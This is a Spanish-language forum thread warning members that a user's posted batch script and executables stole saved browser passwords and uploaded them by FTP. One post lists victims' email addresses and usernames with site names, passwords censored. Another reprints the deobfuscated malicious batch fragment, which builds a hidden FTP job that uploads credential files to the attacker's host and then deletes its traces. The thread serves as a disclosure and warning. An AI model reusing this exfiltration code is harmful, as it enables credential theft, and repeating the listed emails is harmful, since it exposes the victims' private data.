ATENCIÓN - Las contraseñas de navegadores de algunos usuarios han sido hackeadas

Iniciado por Eleкtro, 14 Septiembre 2016, 09:55 AM

0 Miembros y 1 Visitante están viendo este tema.

Eleкtro

Recientemente el usuario leostigma publicó un script en el foro de programación-scripting, y también publicó una serie de archivos executables, que le sirvieron para robar contraseña (mediante un servidor FTP) a los que hayan usado esos archivos.

Por ese motivo, las contraseñas de navegadores de algunos usuarios del foro, sobre todo los habituales en el foro de scripting, han podido ser hackeadas.

Como ya saben, el foro no se hace responsable del contenido que puedan subir los usuarios, solo podemos intentar prevenir que sucedan este tipo de incidentes ...a veces cuando ya es demasiado tarde.

Si alguien del foro descargó su script o executables, debe asegurarse de cambiar su contraseña en los servicios web que esté registrado, sobre todo en servicios importantes como Paypal.




Por mi parte, les intentaré ofrecer la ayuda que pueda en este mensaje.

Estas son (al menos unas de) las cuentas de correo que se han visto afectadas por la infección de este usuario:


Y estos los nombres de usuario con los que se registraron en distintos servicios web:
  • gabo666
  • gabogabo123
  • gabriel rangel
  • gabrielrangel711
  • mrsdax
  • Reikym
  • zando

Aquí pueden ver la lista de páginas web y usuarios que se han visto implicadas (por el momento), he censurado las contraseñas por supuesto:

ACLARACIÓN: Esta lista la he obtenido accediendo al FTP de esta persona, gracias a que otro usuario me informó de este incidente y me proporcionó el user y el pass del FTP.

CitarBrowser:  Google Chrome
Website:  https://es-la.facebook.com/login.php
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.linkedin.com/fetch/fetchx-auth-redirect
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login.php
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login.php
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://col430-sec.mail.live.com/mail/AggregationSetupFinished.aspx
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.123dreamit.com/accounts/register/
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://signup.live.com/signup
Username: gabogabo123
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://reelzhot.com/subscriptions/registrationaff/m-2-panther
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://trafficmonsoon.com/login
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.thepowerlevel.com/silkroad/premium-silk/92-26-2.html
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.goldceo.com/silkroad/premium-silk/92-26-2.html
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://accounts.google.com/SignUp
Username: gabrielrangel711
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://membercp.joymax.com/SignIn/SignInProperty.aspx
Username: mrsdax
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://projecthax.com/login.php
Username: zando
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://ic.paypal.com/webapps/checkout/webflow/sparta/expresscheckoutvalidatedataflow
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://projecthax.com/login.php
Username: zando
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.wtfast.com/member/Account/Login
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.wtfast.com/Account/Create
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://es-la.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://m.facebook.com/login/async/
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://foro.ignetwork.net/register.php
Username: gabo666
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: italy55@outlook.de
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: c.d.c.r@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://us.battle.net/login/es/challenge/8d18a451-7eb4-445d-a78d-8c1d04f1b121
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://accounts.google.com/signin/challenge/sl/password
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://account.leagueoflegends.com/lan/es/protect
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://earnwithinvite.com/login1.php
Username: gabriel rangel
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://likesplanet.com/register.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: mc.chumpitaz@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://mega.nz/login-to-devnull.html
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: kevincaballero1405@gmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: acxaelpotter@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.mercadolibre.com/jms/mlv/lgz/login/authenticate
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.crunchyroll.com/freetrial/anime
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.paypal.com/signin
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://www.worldwaronline.com/login/register
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel711@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://login.live.com/ppsecure/post.srf
Username: claudiadaniela31@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://www.facebook.com/login.php
Username: gabrielrangel709@hotmail.com
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  https://cpanel.hostinger.es/website/install-app/app/wordpress/aid/21240506
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://reikym.esy.es/wp-login.php
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Browser:  Google Chrome
Website:  http://reikym.esy.es/wp-login.php
Username: Reikym
Password: **CENSURADO**
---------------------------------------------------------------------------

Un saludo.








El_Andaluz

Menos mas que no me fiaba de descargarme el programa lo dije en el mismo post no me daba confianza sin poner un vídeo ni nada y así de sopetón vamos que el tal usuario  leostigma no la ha metido doblada menos mas que a mi no me la metido por que no llegue ha descargarmelo.

Aparte que me escribías por los privados, desde aquí te digo leostigma que a mi no me la vas a dar se la has dado a otros y espero que a los usuarios de este foro que le has robado las contraseñas supuestamente que te denuncien uno por uno para que se te quites las ganas de robar contraseñas a los demás por listillo.

Desde hoy tenemos que tener claro que no podemos descargarnos mas nada de ningún usuario novato aunque venga con buenas intenciones. >:D







MCKSys Argentina

#2
El script que había publicado inicialmente, tenía una parte ofuscada. Esa parte era la que debería subir la info por ftp.

Dejo aquí la parte ofuscada (ya desofuscada) de su script original, sólo para que lo vean. Pueden apreciar que su intención ya era maligna, pues aparece el ftp, el user y la pass que quería usar:


...............................................................
echo>> !usb!:informacionftpstart.bat

Timeout /T 2

echo ftp - s:ftpstart.bat>> !usb!:informacionftpstart.bat
echo open ftp.extracto.esY.es>> !usb!:informacionftpstart.bat
echo USUARNAME>> !usb!:informacionftpstart.bat
echo PASSWORD>> !usb!:informacionftps tart.bat
echo put CLAVES*.txt>>!usb!:informacionftpstart.bat
echo bYe>> !usb!:informacionftpstart.bat
echo >> !usb!:informacionstyle.vbs
echo set objshell = createobject("wscript.shell" )>>!usb!:informacionstyle.vbs
echo objshell.run "ftpstart.bat",vbhide>>!usb!:informacionstyle.vbs
attrib -r -h /s /D "!usb!:informacionftpstart.bat"
cd !usb!:informacion
Timeout /T 1
(
ECHO 1d
ECHO e
) | edlin /B style.vbs > nul 1>&0

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
Timeout /T 2

start !usb!:informacionstyle.vbs
Timeout /T 15
TASKKILL /F /IM ftp.exe

attrib -r -h /s /D "!usb!:informacionstyle.vbs"
attrib -r -h /s /D "!usb!:informacionSTYLE.BAK"
attrib -r -h /s /D "!usb!:informacionftpstart.bat"

del !usb!:informacionstyle.vbs
del !usb!:informacionftpstart.bat
del !usb!:informacionSTYLE.BAK

......................................................................


[ELEKTRO]
He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


El_Andaluz

Yo de verdad es que a veces hay cosas no entiendo, si lo sabíais desde el principio que no era de fiar, lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmente por que no me fiaba de este usuario y al final he hecho bien por lo que veo.

Y menos mas porque para mi fue descarado el Script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestro por no a ver revisado antes el script si era con mala intención.

Saludos.


MCKSys Argentina

#4
Cita de: El_Andaluz en 14 Septiembre 2016, 14:26 PM
Yo de verdad es que a veces hay cosas no entiendo si lo sabias desde el principio que no era de fiar lo dije en el mismo post por eso dije si lo habéis probado que casualidad no lo hemos probado ninguno de los que hemos hablado yo por personalmete por que no me fiaba de este usuarios y al final hecho bien.

Y menos mas porque para mi fue descarado el script vamos que si lo hubiera probado en mi PC se hubiera llevado todas mis contraseñas y menos que no ha sido así.

Pero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Saludos.

Sólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

Cita de: MCKSys Argentina en 14 Septiembre 2016, 14:18 PM
He eliminado el nombre de usuario y pass del código, NO ES PLAN de proporcionarle esa información a otros usuarios mal intencionados para que accedan al FTP con esa lista de contraseñas y Paypals ajenos...

Uf!! Sabía que me había olvidado de algo al subir el script, pero no recordaba qué era!!!!! Menos mal que hay más de 2 ojos mirando los posts...  :)

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


Eleкtro

Cita de: El_Andaluz en 14 Septiembre 2016, 14:26 PMPero fallo por partes vuestra por no a veo revisado antes el script si era con mala intención.

Nuestra tarea no consiste en analizar todos los códigos y/o aplicaciones que los usuarios publiquen, sino más bien se limitaría a tratar de que ese código se publique en la sección correcta y se haga de la manera adecuada.

En casos donde existe cierta desconfianza por la fuente de un código o aplicación, por supuesto en muchos casos los moderadores (me incluyo) han analizado ese código sospechoso para intentar verificar que no sea malicioso, en algunos casos se a descubierto que si gracias a ese análisis y se han tomado las medidas necesarias con el usuario.

De todas formas, si alguien nos hubiera pedido como favor que analizásemos el código por que no estaba muy seguro de las intenciones del código, yo lo habría desofuscado y analizado, pero como nadie pidió tal cosa (al menos a mi no), yo solo vi un código escrito en Batch al que no le di mayor importancia indiferentemente de la ofuscación ...precisamente por que estaba escrito en Batch y por eso jamás pensé que este personaje fuese tan estúpido como para publicar datos personales en su propio script (el user y el pass de la FTP).

Un saludo!








El_Andaluz

CitarSólo desofusqué la primera línea del script. No lo desofusqué todo. Pero dí la forma de desofuscar todo el código. Por eso no pude ver que, en su momento, que el script era malicioso.

Además, no soy "experto" en batch, sólo me defiendo un poco en el tema...  :P

La vedad no se que es desosfusqué tampoco entiendo mucho del tema de este tipos de Script pero se supone que existen herramientas para analizarla y ver si hay algo mal intencionado en el Script.

Por que no se ha robado solo las cuentas de los usuarios, que se supone que le han robado hasta las cuentas de los datos bancarios que esto ya si que es grave.

Pero vuelvo a repetir, creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa, porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro pero si sois responsable de revisarlo antes o eso creo y pienso que se debería revisar siempre por seguridad.

Saludos.

Eleкtro

Cita de: El_Andaluz en 14 Septiembre 2016, 14:43 PMPero vuelvo a repetir creo que se podía a ver evitado esto por parte de vosotros los moderadores con esto no digo que tengáis la culpa porque si es verdad que no nos hacemos responsable de lo que suba cada usuario al foro

pero si sois responsable de revisarlo antes o eso creo.

La tarea de un moderador consiste en administrar y clasificar el contenido de un foro, pudiendo ofrecer cierto nivel de seguridad en el contenido que los usuarios descarguen, pero tampoco somos agentes federales del CSI, no estamos aquí para regular todo el contenido que se publique y hacerlo con una lupa en la mano, eso es imposible, vaya, así que la seguridad no siempre es eficaz al 100% y pueden pasar cosas como lo que ha sucedido...

El análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)
De hecho, que yo te haya avisado a ti por mensaje privado, y que yo haya publicado este post de advertencia para los demás usuarios del foro, tampoco entra dentro de mis obligaciones.

Saludos!









El_Andaluz

CitarEl análisis de archivos es algo opcional, algo que surje de la personalidad o amabilidad del moderador, no de su obligación, en este y en todos los foros, vaya. En lugar de criticar deberías estarle agradecido a MckSys Argentina :P (ya se que le estás)


En verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

Yo creo que debería ser algo obligatorio en los foros y mas en este de revisarse los códigos de los Scritp que cada usuario suba por lo menos analizarlos.

Y por cierto te lo he agradecido por privado que me hayas avisado.


Saludos.

Eleкtro

Cita de: El_Andaluz en 14 Septiembre 2016, 15:07 PMEn verdad te estoy criticando a ti que se supone que sabes mas del tema  :xD :P

No es cuestión de saber o no, me confié, simplemente vi un script escrito en Batch y no le di importancia por que es un lenguaje digamos muy... limitado, y vi que estaba ofuscado, pero pensé que el autor del código simplemente lo quiso ofuscar para que las personas inexpertas no pudieran reproducir su tecnica y "robarle" el trabajo que hizo, así que ignoré ese código sin pensar que pudiera ser malicioso.

¿Que fue un error confiar en eso?, si, lo fue, pero ya pasó y yo no tengo la culpa.

Saludos!